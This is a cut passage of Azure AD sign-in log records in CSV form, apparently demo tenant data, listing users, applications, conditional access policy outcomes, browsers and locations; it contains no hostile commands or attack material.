+46,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,911fb8bc-216a-462c-ab06-a1667a193f2c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ed279ba5-6389-4198-91ad-627e11bc0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ed279ba5-6389-4198-91ad-627e11bc0d00,SigninLogs,Sucess,50.6406517,5.572050095
+47,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:44.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5de6a9e-f963-4e46-9ff2-a779067796ac,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c457a232-7a13-4abd-a93c-6f0a009e1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,c457a232-7a13-4abd-a93c-6f0a009e1300,SigninLogs,Sucess,33.7984581,-84.38828278
+48,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:12.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,50831b93-108d-4896-bc44-cae8e4662ea9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 13:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",581df607-a3b5-4d26-ad1e-df521c3f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,581df607-a3b5-4d26-ad1e-df521c3f1400,SigninLogs,Sucess,33.7984581,-84.38828278
+49,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,06:45.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:06,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",cf3e7e97-0a99-402a-b1d4-bc8905476a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cf3e7e97-0a99-402a-b1d4-bc8905476a00,SigninLogs,Sucess,35.01296997,-80.93171692
+50,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:24.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,39182242-cde6-4137-81a5-e52b32a39c54,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c0ce23b7-81fe-4875-94a5-4bf3483e1a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c0ce23b7-81fe-4875-94a5-4bf3483e1a00,SigninLogs,Sucess,50.6406517,5.572050095
+51,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:29.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b493d553-2b45-46cf-b9f6-5148d945e8d4,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e908d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,62115b57-0cb2-458e-8ba0-179e908d1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+52,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:54.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b42afebf-6e0c-42de-bf29-8af4e328d73d,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",028ee73f-e71d-464b-b4fd-9db21bd30c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,028ee73f-e71d-464b-b4fd-9db21bd30c00,SigninLogs,Sucess,50.6406517,5.572050095
+53,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7bc57bb-7b0d-4210-9e16-566cd12f6f73,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 08:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",028ee73f-e71d-464b-b4fd-9db2ccd30c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,028ee73f-e71d-464b-b4fd-9db2ccd30c00,SigninLogs,Sucess,50.6406517,5.572050095
+54,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:34.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e47880d7-0536-4cc7-b9bf-2d67d75ddfb8,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, 